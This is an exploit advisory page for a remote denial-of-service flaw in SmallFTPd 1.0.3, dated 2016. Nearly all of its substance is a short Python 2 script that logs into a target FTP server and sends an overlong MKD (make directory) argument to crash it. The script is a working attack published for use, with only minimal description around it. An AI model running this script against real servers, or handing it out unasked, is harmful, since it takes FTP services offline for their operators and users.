SmallFTPd 1.0.3 mkd Denial Of Service

2016.10.29
Credit: Greg Priest
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

from ftplib import FTP print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: smallftp_mkd_command_DoS_Exploit # Date: 2016.10.26 # Exploit Author: Greg Priest # Version: smallftpd 1.0.3 # Tested on: Windows XP, Windows 7 x64 ''' ftp_ip = raw_input("FTP server IP:") user = raw_input("username:") password = raw_input("password:") killercode = 'CRASH' * 100 ftp = FTP(ftp_ip) ftp.login(user, password) print ftp.login print "CRSAH CODE SENT!" FTP.mkd(ftp, killercode)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top